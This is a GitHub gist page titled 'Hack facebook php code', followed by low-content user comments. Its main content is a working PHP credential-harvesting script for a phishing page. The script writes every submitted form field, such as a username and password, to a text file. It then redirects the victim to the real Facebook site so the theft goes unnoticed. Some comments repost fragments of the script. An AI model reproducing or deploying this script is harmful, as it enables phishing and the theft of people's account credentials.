Skip to content

Instantly share code, notes, and snippets.

@Techgokul
Created January 3, 2018 09:32
Show Gist options
  • Save Techgokul/870aebc9d839d29b705af48b241d3276 to your computer and use it in GitHub Desktop.
Save Techgokul/870aebc9d839d29b705af48b241d3276 to your computer and use it in GitHub Desktop.
Hack facebook php code
<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
@Sophon2
Copy link

Sophon2 commented Mar 16, 2023

@hdjcisx
Copy link

hdjcisx commented Mar 17, 2023

@hdjcisx
Copy link

hdjcisx commented Mar 17, 2023

1764998076JAK

@hdjcisx
Copy link

hdjcisx commented Mar 17, 2023

Screenshot_20230318-003151_Chrome

@hdjcisx
Copy link

hdjcisx commented Mar 17, 2023

2452asf

@FGQPJSS
Copy link

FGQPJSS commented Mar 18, 2023

$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> https://www.facebook.com/profile.php?id=100053453857333&mibextid=ZbWKwL

@FGQPJSS
Copy link

FGQPJSS commented Mar 18, 2023

$value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> https://www.facebook.com/profile.php?id=100053453857333&mibextid=ZbWKwL

@Mirinma
Copy link

Mirinma commented Mar 24, 2023

@rabbit120
Copy link

@Heebowa
Copy link

Heebowa commented Apr 3, 2023

@rjtohan3
Copy link

@Phum24oppoiI
Copy link

@Playmann
Copy link

@sohanislam7019
Copy link

Please reply

@Yogianada116
Copy link

@Yogianada116
Copy link

Uploading Screenshot_2024-03-17-20-59-35-01_a23b203fd3aafc6dcb84e438dda678b6.jpg…

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment